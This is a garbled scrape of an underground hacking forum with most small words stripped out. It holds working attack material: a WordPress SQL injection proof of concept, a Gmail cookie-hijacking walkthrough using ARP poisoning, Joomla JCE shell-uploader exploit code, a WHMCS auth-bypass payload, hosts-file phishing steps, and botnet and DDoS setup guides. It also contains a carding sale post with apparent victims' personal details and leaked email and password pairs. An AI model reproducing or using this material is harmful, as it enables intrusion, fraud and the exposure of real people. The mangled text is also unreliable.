does really works wrote table width hello friends this trick still working dont beleieve look the below trick posted. 
this simple guide read somebody else facebook messages without any effort cheers mike does works man. 
exploit title sql injection ajax post search wordpress plugin author marcela benetrix home. 
org extend plugins card. 
search ajax post search wordpress plugin description this plugin will allow your website visitors search the posts your site without page refresh. 
sql blind injection description the problem was located cardoza ajax search. 
php file more specific the search function. 
could see that the srch txt field hadn't been sanitized. 
poc admin admin ajax. 
php srch txt 'or action the search text via ajax possible access the database and consequence get user information such usernames passwords among other data vendor notification the developer. 
replied immediately and fixed the problem. 
posted plugin track repository. 
org ticket because new version has been released even though. 
version plugin released most websites aren't rushing update. 
checked websites first page and all them were vulnerable. 
take care and don't too lazy update your websites. 
would like give try. 
dont see the content. 
ill check this out and reply account suspended give new link please. 
paypal verify method want. 
need any other trick for. 
thank you very much amazing info. 
nice tut for share bro. 
lets see works link not working anymore please update. 
can see well please. 
dude link working fine. 
onion tor almost undetectable all the anti viruses virusscan. 
codefire wrote tut how backdoor pdf's get lots slaves source hackforum this guide will tell you how backdoor pdf. 
metasploit can downloaded search the web for free ebooks make your pdf file ready upload your fud server hosting service which provides direct download links would use. 
thank you it's really useful. 
the mole automatic sql injection exploitation tool. 
all you need provide vulnerable url and valid string the site you are testing and the mole will detect the injection and exploit either using the union technique boolean query based technique. 
released for download automatic sql injection exploitation tool the mole automatic sql injection exploitation tool. 
did mention the mole when first heard about back the mole automatic sql injection sqli exploitation tool. 
features support for injections using mysql sql server postgres and oracle databases. 
auto completion for commands command arguments and database table and columns names. 
support for filters order bypass certain ips ids rules using generic filters and the possibility creating new ones easily. 
exploits sql injections through get post cookie parameters. 
exploits sql injections that return binary data. 
powerful command interpreter simplify its usage. 
thnx don't copy and dump posts otherwise hang hehehe nice pratham wrote reply and copy code dance good thank you. 
thnx don't copy and dump posts otherwise hang hehehe nice thx for sharing. 
dont believe lemme see for myself. 
edit couldnt get work link doesnt exist. 
maybe just not doing right. 
hacking gmail using the cookie loophole and its solution hey guys ethical hacker always curious find the new loopholes existing websites softwares and other things. 
today over the internet found very dangerous loophole the gmail best mailing services the world and going share that with you guys. 
have tried this from college network there will some assumptions and tools needed for that. 
note this tutorial for educational purposes only rolleye hey google staff you final this inappropriate content. 
please inform remove this thanks some assumptions you are local area network lan switched wireless environment example office cyber caf mall etc. 
you know basic networking. 
tool used for this attack cain abel any ethernet capturing tool network miner firefox web browser with cookie editor add ons anec cookie editor all the tools mentioned here are available for free downloads you just have google them attack detail assume you are connected lan wireless network. 
our main goal capture gmail cookie from the network. 
can only capture cookie when someone actually using his gmail. 
noticed normally free classes college when people normally check their emails. 
you are cyber caf mall then there are more chances catching people using gmail. 
will step step you are using wireless network then you can skip this step. 
using cain arp poisoning and routing switch allows unicast traffic mainly pass through its ports. 
when and are communicating eachother switch network then will not come know what are communicating inorder sniff that communication you would have poison arp table switch for. 
wireless you don have poisoning because wireless access points act like hub which forwards any communication all its ports recipients. 
start cain from start program cain cain click start stop snigger tool icon from the tool bar will first scan the network see what all ips are used the network and this list will also help launch attack the victim. 
then click sniffer tab then host tab below. 
right click within that spreadsheet and click scan mac addresses from the target section select all hosts subnet and then press. 
this will list all host connected your network. 
you will notice you won see your physical your machine that list. 
how check your physical click start run type cmd and press enter the command prompt type ipconfig and enter. 
this should show your address assign your. 
will have following outputs ethernet adapter local area connection connection specific dns suffix. 
main thing know here your address and your default gateway. 
make note your address default gateway. 
from cain you will see list addresses here you have choose any free address which not used anywhere. 
not used anywhere the network. 
click configure apr use spoof and mac address type. 
and from the poisoning section click use arp request packets and click. 
within the sniffer tab below click apr tab from the left hand side click apr and now click the right hand top spreadsheet then click plus sign tool from top. 
the moment you click that will show you list address left hand side. 
here will target the victim address and the default gateway. 
the purpose arp poisoning between victim and the default gateway and route the victim traffic via your machine. 
from the left side click victim address assume victim using. 
the moment you click victim you will see remaining list the right hand side here you have select default gateway address. 
finally click start stop sniffer tool menu once again and next click start stop apr. 
this will start poisoning victim and default gateway. 
using network miner capture cookie plain text are using network miner capture cookie but network miner can used for manythings from capturing text image http parameters files. 
network miner normally used passive reconnaissance collect domain and finger print the connected device your machine. 
you don have network miner you can use any other sniffer available like wireshark iris network scanner netwitness etc. 
are using this tool because its ease use. 
open network miner clicking its exe pls note requires. 
from the select network adaptor the list click down arrow and select your adaptor you are using ethernet wired network then your adaptor would have ethernet name and address your machine and you are using wireless then adaptor name would contain wireless and your address. 
select the one which you are using and click start. 
important thing before you start this make sure you are not browsing any websites using any instant mesaging and you have cleared all cookies from firefox. 
click credential tab above. 
this tab will capture all http cookies pay close look host column you should see somewhere mail. 
you could locate mail. 
com entry then the same entry right click username column and click copy username then open notepad and paste the copied content there. 
remove word wrap from notepad and search for the line. 
cookie which you have captured will contain many cookies from gmail each would separated semicolon cookie will start with and will end with semicolon you would have copy everything between and semicolon example axcvb mzdwkfefv copy only axcvb mzdwkfefv now have captured cookie its time now use this cookie and replay the attack and log victim email for this will use firefox and cookie editor add ons. 
using firefox cookie editor replay attack. 
open firefox and log your gmail email account. 
from firefox click tools cookie editor. 
the filter box type. 
com and press filter and from below list search for cookiename. 
you locate then double click that cookie and then from content box delete everything and paste your captured cookie from stepb. 
and click save and then close. 
from the address bar firefox type mail. 
com and press enter this should replay victim cookie gmail server and you would get logged victim gmail email account. 
sorry you can change password with cookie attack. 
limitation attack solution how protect urself from this hack google has provided way out for this attack where you can use secure cookie instead unsecure cookie. 
you can enable secure cookie option always use from gmail settings. 
settings browser connection always use. 
hope you have enjoyed this and soon also make video tut this topic. 
any queries please comment also shout sarcastic blum. 
this would awesome for spying wrote table width hello friends this trick still working dont beleieve look the below trick posted. 
this simple guide read somebody else facebook messages without any effort cheers mike the link seems suspended. 
send the procedure please. 
big deal with this. 
pratham wrote this tutorial will show you how spread your trojans viruses etc. 
you the you the stss. 
hello all offering crypting service. 
the price crypt icon changer and file binder. 
payment libertyreserve alertpay paypal. 
thanks for this will try this out. 
moy fish fish fish. 
here the list passwords free download. 
com site media txt passwords. 
txt you didn't get success using the above password list then you can get the uniqpass dictionary file from. 
see preview uniqpass from these million randomly selected passwords. 
scripts additional irongeek's hour anti forensics course video youtube. 
thanks for sharing lets see how works. 
codefire wrote you need good and simply proxy program that made for you really easy use. 
onion addresses with given prefix hmm fbi sent from using tapatalk. 
how setup own botnet iht booter. 
exe click here for download basic requirement for bot subdomain hosting patience download here botnet builder step your cpanel and click subdomain icon now create subdomain like kiddie. 
save and close now all settings are done now try open bot open subdomain. 
com username root password toor user and password are set default please change after login. 
does work really gonna check this out. 
com scripts for updates required parameters domain new account domain user new account username password new account password package new account hosting package plan email contact email sample run create whm account. 
com user hosting password manager package unix parameters passed then input form will shown enter data. 
this script can also run from another php script. 
this may helpful you have some user interface already place and want automatically create whm accounts from there. 
this case you have setup following variables instead passing them parameters user domain new account domain user name new account username user pass new account password user plan new account hosting package plan user email contact email your whm login data whm user root reseller username whm pass password the password you use login whm end settings. 
not edit below whm host server function getvar name def isset request name return request name else return def domain name new hosting account create subdomain just pass full subdomain name example newuser. 
com isset user domain user domain getvar 'domain' username the new hosting account isset user name user name getvar 'user' password for the new hosting account isset user pass user pass getvar 'password' new hosting account package isset user plan user plan getvar 'package' contact email isset user email user email getvar 'email' parameters passed then create account empty user name create account the cpanel server script params plan user plan domain user domain username user name password user pass contactemail user email result file get contents script. 
params output result echo result. 
result otherwise show input form else frm cpanel whm account creator input border solid black cpanel whm account creator domain subdomain domain without username username created password package package hosting plan name. 
make sure you cpecify existing package contact email eod echo frm. 
thank for nice tool brother keep thank you very much for share this tool with. 
anyways thanks lot bro color good you can bypass fortiguard web filtering using proxy socks vpn anon sites tor browser. 
how its works please give tutorial. 
thanks for sharing bro wrote table width guys today would like share method how verify your paypal without using your own credit card. 
com wed davisel hotmail. 
com andycat dirtmomma embarqmail. 
com disney dadymark optonline. 
net babygirl donnanangle yahoo. 
com myboys dernswinkl aol. 
com katung debbiej cfl. 
com seawoods creativediva live. 
com singer disewnice aol. 
com smitty enjoy full big list here special for members. 
hey guy thanks for the link let try out. 
nice man very good. 
thanx bro hats off for this exploit. 
mehn guys are the bomb like tick tack need learn how use this asap please how change the emails. 
amnpardaz security research penetration testing group title exploit for jce joomla extension auto shell uploader. 
net vulnerable version jce. 
prior versions also may affected exploitation remote with browser original advisory. 
htm vendor supplied patch. 
net news item jce released cvss base score. 
coded mostafa azizi error reporting ini set max execution time ini set default socket timeout implicit flush echo' jce joomla extension remote file upload turkguvenligi. 
net day joomla shell uploader. 
enctype multipart form data method post siteleri daki kutuya yaz. 
have balace paypal account did help redemm that. 
say attach your debit card. 
thanks lot fro this. 
works will definately purchase. 
clondon wrote new and would like see all this site contains. 
think you very match. 
xcoding team wrote hello bitshacking community have you ever wanted hack someone's mail account you need find person's sensitive information you want invade person's paypal skrill amazon apple facebook any other site account we're here present gmail password cracker the name says gmail password cracker simple software developed for cracking gmail password accounts. 
the app attacks google's password recovery server get the encrypted pass related the mail acc your target. 
then using powerful bult dictionary gmail password cracker decrypts the password the success rate about yeah lot people still use very simple passwords you can use our software countless ways. 
just creative you can make good money with you have the right knowledge we're selling gmail password cracker for. 
btc via satoshibox you can also download the trial version test the program. 
there limit maximum password decryptions any doubts suggestions you can contact skype xcodingteam happy cracking. 
biokinetix wrote anonymous surfing vpn and proxy tools there are many options when comes being anonymous online. 
you can download from jondo jondo open source and free charge program for windows linux and macos. 
you can download from tor tor very useful for online anonymity its protect your privacy defend against form network traffic analysis. 
download from tortilla open source tool that allows users securely anonymously and transparently route all tcp and dns traffic through tor regardless the client software and without relying vpns additional hardware virtual machines. 
you can download from proxpn proxpn's vpn software lets you surf the web the way was intended anonymously and without logging and tracking your activity. 
download ultra vpn ultravpn simple user interface connect disconnect their vpn servers. 
download the software client and create free account hope this helps some you guys. 
very simple and easy way earn month with investment. 
here's the link get started click. 
use this you want quickly get number that will work for this you can put anything for the info when you first start the app. 
you've already heard about that suggest this. 
protential vuln vuln linux. 
reply and copy code dance good hide php code. 
coded mostafa azizi error reporting ini set max execution time ini set default socket timeout implicit flush echo'jce joomla extension remote file uploadjce joomla extension remote file upload. 
enctype multipart form data method post hostname. 
com path joomla just please specify file upload specify port default proxy port fields are required function sendpacket packet response output proxy regex. 
global proxy host port html user pass proxy ock fsockopen host port stream set timeout ock ock echo response from. 
die else parts explode proxy echo 'connecting proxy. 
ock fsockopen parts parts stream set timeout ock ock echo 'no response from proxy. 
die fputs ock packet response proxy html while feof ock html. 
fgets ock else html while feof ock eregi chr. 
fread ock else html fclose ock response output echo htmlentities html count res htmlentities html str array. 
die count echo 'target exploitable. 
host post 'host' path post 'path' port post 'port' proxy post 'proxy' isset post 'submit' host path port intval trim port port port path path strlen path die 'error. 
check the path proxy path else. 
path host str replace host path str replace path packet checking exploitability packet get. 
php option com jce task plugin plugin imgmanager file imgmanager version cid. 
bot for jce sendpacket packet packet uploading shell gif file content gif content. 
file get contents files 'datafile' 'tmp name' data data. 
content disposition form data name upload dir data. 
content disposition form data name filedata filename data. 
content type application octet stream data. 
content disposition form data name upload overwrite data. 
content disposition form data name filedata filename day. 
content type image gif data. 
content disposition form data name action data. 
php option com jce task plugin plugin imgmanager file imgmanager method form cid. 
bot for jce packet. 
content type multipart form data boundary packet. 
accept charset iso utf. 
cookie jce imgmanager dir utma. 
utmcsr direct utmccn direct utmcmd none packet. 
proxy connection close packet. 
data sendpacket packet packet change extension from. 
accept text html application xhtml xml application xml. 
content type application form urlencoded charset utf packet. 
accept encoding deflate packet. 
utmcsr direct utmccn direct utmcmd none utmb. 
utmc jce imgmanager dir ren json folderrename args day. 
sendpacket packet packet check for successfully uploaded packet head. 
bot for jce sendpacket packet stristr html ok' true echo exploit faild. 
else echo exploit succeeded. 
php hide thank you. 
thnx don't copy and dump posts otherwise hang hehehe. 
hello want see this hidden content. 
bond benz wrote rdp cracker included with user and password list download. 
myloveisgone wrote tried but failed establish connection. 
this can downloaded here. 
once installed start pidgin. 
called otr which stands for off the record messaging and can downloaded here. 
once are done with that can enter our xmpp account details and start chatting make new account you not have one. 
you need list free xmpp service providers you can get one this link. 
for the example will make new account with the wtfismyip. 
you can register through the client like will show you how you can register online from this link. 
the username and password will your choosing but the domain will wtfismyip. 
com without the quotation marks. 
the next steps take one more step even more secure will set tor socks proxy that not only are the messages encrypted with otr but the traffic encrypted with tor. 
you get error that pops don worried. 
hope this tutorial has been helpful and always you have any questions problems feel free post comment and will best help. 
color please check virus scan every software that you download from this forum and dont post harmful applications and softwares with keyloggers trogens and etc. 
color check virus scan here url. 
not work bro aggressive. 
will like try this. 
great tut and really enjoyed reading. 
checkign this out need for bud money. 
authentication bypass vulnerability author agd scorp contact vorscorp hotmail. 
com order now date monday december dork intext powered recommended you must have beef tamper data already installed not recommend doing this process manually. 
completely vulnerable this vulenrability but. 
version whmcs has added extra cache security i've added extra payload for you can the exploitation process without the payload the. 
com whmcs admin login. 
getpost after you have successfully entered that into your browser the page will lag for abit due the cache validation which ofcourse will change. 
when the page loading quickly open tamper data and change the loading post session request the payload this post post login passthru base decode server payload payload login title execorder hook urlencoded redirect admin index the result once you have done this process you will automatically redirected the admin page although the administrator has enabled cache security this process will fail. 
solution fix bec day. 
reply see hidden content. 
step now install ogwhatsapp your android smartphone. 
method use switchme run multiple accounts switchme another android app that allows you have two separate whatsapp accounts single android device but this app requires your android smartphone rooted. 
step install switchme multiple accounts your smartphone. 
that's webxp cam that's not scada it's node device connected via pci controller router your case intelligent one like those cisco installed ones. 
what show you here real scada. 
abba wrote thank you for sharing with. 
will good can chat better messenger and here mail. 
com thanks bro and hope read from you too. 
have added you well yahoo but don't know maybe your yahoo still working but will download skype now that can chat better there. 
lol with traditional way instead. 
size method win free bitcoins size have method win free every day bitcoins contact skype clipsbox icq will send you method. 
interesting service thanks for posting. 
hidemyass premium proxy list dec hidemyass premium proxies really proxies support that can help individuals conceal from system agents and hackers. 
hidemyass premium proxy list happy. 
hidemyass daily premium proxy list. 
new screenshots description list the latest hidemyass premium proxies catcher not the free proxies the listed proxies loaded the begin are the full list very fast request get any list you want you can copy the list the clip board the format the lists plain text this free simple and very fast tool updated daily what'is new this version. 
fixed some bugs add uninstall option from the program and desktop group add new custom and setup wizard add filter country you have all the lists txt format add more download links void dead links i'am not the coder this tool the virus scan report code. 
com file dacacd ecd efdff analysis download links code. 
net captcha setup code. 
biz evg frk setup multiupload. 
file cdcee bded setup. 
can try this one pls. 
pirateboy wrote this tutorial for education purposes only and not responsible any way how you use the information provided and what you with the files. 
this first topic here and hope you enjoy spy eye new http botnet spyeye was written this moment exe has size. 
first download spyeye this link hidden content cannot quoted. 
step step upload main. 
step create new database and user. 
add the user your new database and give all privileges. 
step edit main access panel config. 
php edit formgrab access panel config. 
php step use phpmyadmin import all. 
panels are now ready step configure the builder. 
com your own hosting first download spyeye this link hidden content cannot quoted. 
com skype iam thegame like facebook page. 
free open source disk encryption software for windows vista mac and linux main features creates virtual encrypted disk within file and mounts real disk. 
encrypts entire partition storage device such usb flash drive hard drive. 
encrypts partition drive where windows installed pre boot authentication. 
encryption automatic real time the fly and transparent. 
and pipelining allow data read and written fast the drive was not encrypted. 
encryption can hardware accelerated modern processors. 
provides plausible deniability case adversary forces you reveal the password hidden volume steganography and hidden operating system. 
table width width main truecrypt window truecrypt volume creation wizard encryption hash algorithms encryption decryption speed benchmark intel xeon. 
ghz cores enabled truecrypt volume creation wizard table width width system wide hot keys main truecrypt window system menu table table keyfiles mount options system encryption settings truecrypt volume creation wizard mac encryption hash algorithms truecrypt volume creation wizard mac formatting preferences favorite volumes organizer built keyfile generator performance options language pack selection truecrypt traveler disk setup test vectors truecrypt volume properties. 
thanks alot for anything this website. 
code exploit title toshiba studio change admin password csrf vulnerability date. 
exploit author hubert gradek affected version firmware tested toshiba studio cve cve exists day exploit password must minimum digits login admin exploit. 
submit toshiba studio change admin password. 
sweet man thanks for share reom. 
lets see the content. 
greate man test the file. 
thanks for your share. 
hope its work for. 
let see let see let see let see. 
the link has broken. 
net images smilies dirol. 
says adfly account has been suspended. 
can send via update the link. 
going download see how works. 
night rid wrote attach config attach download scan. 
all links are dead. 
will for sure test this. 
nice mate seem interesting. 
there another method named rainbow table siminicelar dictionary attack. 
adfadsf here the list passwords free download you didn't get success using the above password list then you can get the uniqpass dictionary file from. 
sorry post this bro. 
but just virus scan and got this file infected. 
thank you for posting your hack. 
hidden content you must reply see links tor almost undetectable all the anti viruses hidden content you must reply see links. 
cant seem find the download link please kindly this. 
this sounds really cool and neat. 
all have this put the domain name the link not working anymore. 
thank you man share. 
thank you for this much appriciated. 
com rlfdm ura introduction sector note please note have spoilered image have bandwidth. 
this stage will teaching you the following center how setup your hosting. 
center how upload and configure your stresser. 
php center includes ezsql. 
com set database host define user set database user define pass example set database password define name set database name line this your database host. 
com' mysql host name mysql hostport mysql host port mysql database mysql database mysql shelltbl 'shellpool' mysql table name will created does not exist mysql stengine 'myisam' preferred mysql storage engine myisam mrg myisam innodb you will only need edit the following with your mysql database information php code mysql username mysql user name mysql password 'example mysql password mysql hostname 'mysql. 
locate the import button located the top phpmyadmin once you're the import menu. 
like below then after click like provided below. 
then you should get success message and the databases should appear the side. 
click the register button and register your account. 
now your account registered. 
we're not done yet activating your account and making yourself administrator sector now back phpmyadmin. 
you should see your own profile you want click edit which course the little pencil button. 
your account now active and you're administrator spoiler click hide accessing the administrator control panel sector the control panel yourdomain. 
here are your options center buy shells from people the ihf marketplace. 
center get your own from pastebin and use shell checker provided the downloads. 
center request free shells look for giveaways ihf. 
the passwords are hashed you will need hash password cracking tools like hascat this. 
thnx brother for you. 
thanx for that like hack account own. 
privacy has transcribed the grugq's guide for freedom fighters out ther. 
paranoid and never contaminate. 
thx man for sharing this. 
let watch some porn. 
once again this looks good. 
you are the best. 
thank you hope this really works. 
account vip cracker bruteforce use software vip cracker proxyfier. 
wek mont used username astrube password dcurir username desasterx password username justeplaycards password worldwideshit username shopeforfree password azerty month unlimited username password username password gethighordie username thuglife password username hidemydick password username changerv password rangerceas username sezare password iix username studiowork password dannybigboss username wallstreet password kidsaresucjack month unlimited username nakazaki password naka username blackshot. 
would surely like try out. 
seems pretty good tool. 
cutest taco ever seen lifer damn want taco bell. 
sounds intresting will check out. 
going try this one. 
friend request bomber too requests hour yjankyou. 
thank you for sharing here. 
thanks for providing such nice tut appreciate. 
hey can you fix the images and links this. 
new favorite site and this works youll new hero. 
thanks searching for this things. 
asks for the password archive. 
let try too mate. 
zabi sir lah tabon mok. 
thank you for posting this firstpost. 
thank you for share. 
codefire wrote exploit title joomla com attachments component arbitrary file upload vulnerability google dork inurl index. 
php option com attachments date exploit author stars hacking team are satanic nullerror mohamadpk blackc der email. 
com ste ler mind yahoo. 
com vendor homepage software link tested lin exploit. 
find your file this path. 
end demo spt pejv skitt netw hurr kinglet skipp amo vahid ahmadbady iskorpitx hellboy cyber terrorist and all best friend thanks man. 
was awsome becoz helped bypass the fortiguard web filtering used university. 
anyways thanks lot bro color good. 
welcome cashcrate you can start making money right away completing offers taking surveys. 
com far made week bucks. 
proof attach config attach. 
size sql injection master course complete guide sql injection which you will design your own lab and learn attack. 
pentesting hacking sqli homepage code. 
com draft sql injection one oldest and powerful threat web application yet there great explanation solve the problem and hands guide master sql injection. 
price size size download size password iskof. 
hello i'm looking for someone can either hack game called era for like simple stuff such god mode give myself any item the database etc. 
use work there know every command admins can that helps. 
i'm also loking for someone who knows how hack accounts like forums enail you can contact skype email forum. 
comrade you have bank logins sale. 
contact kik wallstreetman thanks sent from iphone using tapatalk. 
gimme the download link dude and thanks advance. 
very usefull for beginers. 
thanks for the information. 
why don't need you. 
phoenix great tut greetz uret. 
this the tutorial desktop phishing. 
desktop phishing new technique phishing advanced. 
phishing desktop phishing phishing. 
attacker convinces the victim click the link fake login page which resembles genuine login page. 
victim enters his credentials fake login page that goes attacker. 
victim then redirected error page genuine website depending attacker. 
but the main drawback phishing that victim can easily differentiate between fake and real login page looking the domain name. 
can overcome this desktop phishing spoofing domain name. 
attacker sends executable file victim and victim supposed double click. 
victim types the domain name original genuine website and taken our fake login page. 
but the domain name remains the same typed victim and victim doesn't come know. 
rest the things are same normal phishing. 
need configure hosts file first which located windows system drivers etc whenever visit any website say. 
com query sent domain name server dns look for the address associated with that website domain. 
but before doing this the hosts file our local computer checked for the address associated the domain name. 
suppose make entry hosts file shown. 
com would taken this. 
query for resolving address associated with. 
com would sent dns. 
hope you got idea that how modification this hosts file victim's computer can misused. 
need modify victim's hosts file adding the genuine domain name and address our fake website phishing page. 
whenever victim would visit the genuine website would directed our fake login page and domain name the url box would remain genuine typed victim. 
hence domain name spoofed. 
host phishing page your computer. 
since the webshosting sites like. 
com etc where usually upload our phishing page not provide that points your website like. 
address points webserver and not website. 
need host the phishing page our computer using webserver software like wamp xampp. 
download the wamp xampp. 
copy your phishing page and paste the directory wamp the default path wamp run wamp server your. 
right click the wamp icon the system tray and select start all services visit your public address and you must see your phishing page. 
you dont have physical access victim's computer. 
then copy your hosts file and paste anywhere. 
edit with any text editor and associate your public address with domain you wish show. 
like this case when victim would visit gmail. 
com would take website hosted. 
replace with your public. 
compress hosts file such that when victim opens automatically gets copied default location windows system drivers etc and victim's hosts file get replaced our modified hosts file. 
then you can bind this file with any exe using binder directly give victim. 
she supposed click and you are done. 
not sure what itll but ill try website unavailable. 
nice thank you for sharing this. 
twistakelv wrote download jpg exploit for low mega pixel. 
com analysis ntzjzda mjm. 
will try and see works thank you. 
gotta try this thank you. 
introduction file upload vulnerability hidden content you must reply see this content. 
icq sell cvv good balance and hacker big cvv good icq sell cvv all country all country good and fresh sell cvv good balance and hacker big cvv good i'm hacker good cvv and seller cvv good now have more for sale sell cvv acc paypal dumps track bank login transfer online rdp smtp mailler. 
i'm big hacker really all forum contact icq yahoo peter. 
com skype diagomonty sell credit card online good payment for shopping online. 
list price good for fresh live. 
format always full info card type first name last name number expiry date cvv address zip code city town state country phone dob ssn mother's maiden name verified visa cvv employment position held demo fullz info visa james schofield ridgewood terrace springfield jscho. 
primerica dot com dob dlstate dlexp initials pin question first elementary school answer ridgewood ssn mastercard lina suarez lina. 
chase dot com forestview evanston dob dlstate dlexp initials pin question first elementary school answer washington ssn sell info dob ssn findrivlicno name address good work format finid firstname lastname findrivlicno housenumber streetname aptno pobox city state zip phonenumber birthdate email line chad harrison new battle grove road baltimore char. 
verizon dot net transfer western union transfer western union bank asia canada france germany italy nigeria and very easy cashout african price mtcn mtcn mtcn dumps track pin usa dumps track pin dumps track track dumps track track pin classic standard gold platinum business signature world amex discovery dumps track track pin classic standard gold platinum dumps track pin dumps track track dumps track track pin classic standard gold platinum europe dumps track track pin classic standard gold platinum visa master amex discover visa master amex discover large number itali spain denmark sweden france germany ireland israel new zeland switherland slovakia middle east ytaly france. 
bank login transfer bank halifax boa chase wells fargo. 
balance transfer bank lloyds tsb barclays standard chartered hsbc. 
balance gbp paypal account with without balance acc paypal veritified with balance acc paypal veritified with balance acc paypal veritified with balance buy over will sell for you good cheap good price next time dont sell. 
dont want sell and small. 
only accept payment with perfectmoney wester union money gram bitcoin web money will discount price for are reseller buy everyday buy many all cvv will tested before sell that's sure. 
check live site market. 
net not live not sell for you and have some rule. 
don't talk about test free sample screenshot with. 
not trust can don't contact not trust can buy few little test. 
all checked before send for. 
not live not sell. 
and warranty for after buy. 
after hours won't change. 
not accept can don't contact. 
you need buy cvv credit card please contact now for more information icq yahoo peter. 
com skype diagomonty please contact soon hope will well. 
let's see want know about this post. 
thanks men very good wow thanks men very good price very nice super wow good lol. 
looking nice lets give try. 
color how tunnel using ssh with putty color first all what ssh color color ssh secure shell ssh network protocol that allows data exchanged using secure channel between two networked devices. 
now this tutorial will teach you how tunnel using ssh and the ssh client that will using putty. 
put this the putty host name. 
ssh tab tunnels then put this the source port you can actually choose any port advise use the port range then check dynamic and click add. 
back session and paste. 
save sessions then click save. 
click open then login guest then password guest. 
configure your browser recommend you use mozilla with these settings click tools options advanced network settings. 
click manual proxy configurations and insert this ssl proxy. 
port nce again the socks host should the same with the socks host you configured with the client. 
now your done click the settings. 
your should appear like this your address. 
color ssh tunnels for everyone port the client not socks. 
root root thnks for reading guys. 
thank you for helping. 
shi wrote thank you. 
will try out thanks. 
hope will still work. 
sharing with you all huge email and password dump got hands about year ago. 
download dump hidden content you must reply see links download this hidden content you must reply see links download huge password list for use hash cracker hidden content you must reply see links enjoy and please say thanx. 
pratham wrote hey hey don't spam everywhere. 
you want cpanel for hosting you want hacked cpanel for what purpose you want sir purpose for the cpanel deliever mails bulk emails which extracted. 
getting webmailer cpanel would better. 
because really dont know what you meant cpanel for hosting hacked cpanel but would glad hear from you which best suits purpose sir. 
codefire wrote ransomware threat the rise but the bad news that ransomware campaigns are easier run and now ransomware kit being offered hackers for free for anyone download and distribute the threat. 
how protect yourself from ransomware threat last week introduced you that could help you deal with different variants ransomware malware and unlock encrypted files without paying off single penny the cyber crooks. 
keep yourself safe also have excellent article i'd like learn how this things work. 
logesh wrote lemme try this thanks. 
love this this great. 
best crypter find here. 
tnx man for this informaton. 
thinks very match thinks very match. 
free vps server free vps ram free domain name free webhosting the most affordable free premium vps hosting the internet the most affordable free premium vps hosting the internet. 
all our free plans are fully customisable your needs. 
thank you fir this tut man. 
times noticing they either have execute privs shut off tmp gcc not installed even compile diff machine the records for memory are off during exploit can execute after best advice this root like find out what type arch either bit use uname find out the linux version kernel and try match compile the exploit and download via wget like learned how hope jeez works wget than move temp root not try check for this during sqli etc dba try look for mysql showing using dbs this occurs likely have root etc get the hashes like this passwords and. 
com will crack pass more dollars pass they are pretty good most passes work check for ssh always any network ports that will allow usernames gleaned allot times you will find that mysql root logins arent valid users the box this common but passwords are likely the same look for setuid programs etc really pay attention rooting very hard thing some linux severs due shared vhosting hack the actual machine need root odds are the pass going big you need any help have request just post the site domain you want hack ill more than happy help learning allot still maybe can show trick dont know. 
thankks bro ill check out. 
right codefire bro rolleyes. 
what this particular botnet used for mostly. 
cstribal wrote can anyone say this tool safe not thanks for sharing this awesome tool. 
want share with private shell cyber army hidden content cannot quoted. 
color reply here view the download link. 
bye thanks bro for sharing. 
will give this try. 
what working shell thanx bro. 
endgam wrote apologize this the wrong sectchecking out ion for this. 
thanks for sharing great full. 
nice tutorial very good. 
these tools are specialised performing and even automating sql injection attacks websites. 
bsql hacker bsql hacker aims for experienced users well beginners who want automate sql injections especially blind sql injections. 
the mole mole automatic sql injection exploitation tool. 
pangolin pangolin penetration testing sql injection test tool for database security. 
sqlmap sqlmap open source penetration testing tool that automates the process detecting and exploiting sql injection flaws and taking over database servers. 
havij havij automated sql injection tool that helps penetration testers find and exploit sql injection web page. 
enema sqli enema not auto hacking software for script kiddies. 
sqlninja sqlninja tool targeted exploit sql injection web application that uses microsoft sql server its back end. 
sqlsus written using the perl programming language this open source penetration testing tool for mysql injection and takeover. 
safe sql injector safe one the most powerful and easy usage penetration tool that automates the process detecting and exploiting sql injection flaws and taking over database servers. 
sql poizon this tool includes php asp rfi dorks that can used for penetration testing. 
com then type this search color color intext program msn messenger filetype txt intext program msn messenger filetype php intext type password filetype txt intext type password filetype php color can replace the msn messenger with firefox opera explorer. 
thanks let check this out. 
pentoo security focused live based gentoo it's basically gentoo install with lots customized tools customized kernel and much more. 
features changes saving cuda opencl enhanced cracking software john the ripper hashcat suite tools kernel. 
and all needed patches for injection xfce. 
all the latest tools and responsive development team here non exhaustive list the features currently included hardened kernel with aufs patches backported wifi stack from latest stable kernel release module loading support ala slax changes saving usb stick xfce cuda opencl cracking support with development tools system updates you got finally installed download pentoo. 
somebody please explain how this works. 
cheers mike lets see this trick then. 
codefire wrote the first not android stealer ever created raziel presents razstealer. 
update hide replyreply whats new you can now enable the feature auto start the stealer when cludes date ania. 
wanna know how setup stresser have dedicated and vps servers they are offshore want the features below members panel boot panel admin panel log users when login api panel and login system someone can setup this for message skype spookydoxers. 
good shit thanks bro. 
still working this still working this thread. 
can't see the trick wrote table width hello friends this trick still working dont beleieve look the below trick posted. 
there program what finds out people address. 
testew wrote thanks man can not see anything someone knows something please. 
i'll try this out thanks. 
i'd like check this out. 
thx hope its working. 
thansk for this share. 
thanks for sharing information. 
hope this will work. 
trying learn and new. 
would this doable need someone's help. 
can also have bank logz with this one lol. 
you can download imbot here. 
clean download it's mine. 
there are also lot tutorials for different bots here just search the name your bot. 
codefire wrote this tutorial for education purposes only and not responsible any way how you use the information provided and what you with the files. 
first download spyeye this link hide reply hide reply step step upload main. 
php edit formgrab access panel. 
com your own hosting first download spyeye this link hide reply hide reply thanks for reading tutorial. 
connect with skype iam thegame like facebook page url and join group url. 
thank you for sharing with. 
prince chaddha wrote facebook account reset hijack session day exploit only for attach config attach nice exploit look. 
wrote thnk brother thanks for sharing. 
hello you are the best. 
interessting let try this thank you. 
lets have look would great. 
thank you very much for this sharing brother. 
does anyone use exodus btc miner. 
thanks lot for this will totally check out. 
have see this aii. 
thank you can you help with this dont understand. 
thanks for sharing with. 
how create phishing page means can create but when create and access the site looks incomplete there blank spaces can anyone help. 
awesome man thanks for the share. 
mattzpasw wrote hello all today want give you for the first time version ddos distributed denial service powerful and for free created only for you the program was created with visual basic and very fast especially the attacks mattzddos it's project born for satisfy and help who haven't got good experience about the hacking ddos and black hat fact semi automatic and require only the website url with the time the attack and the port. 
this program has various attacks methods like tcp spoofed udp spoofed ack spoofed syn spoofed http http proxy ovh drop screenshot virustotal scansion obviously being tool for perform ddos attacks you will see that the file will releived from antivirus but don't worry clen and safe. 
use guide download the program from this link run the. 
thanks cant wait start cracking. 
j'aimerai tester cela plus vite. 
nice find thanks for posting. 
hello thanx for this. 
install curl for your navigate your web browser preferably firefox chrome safari. 
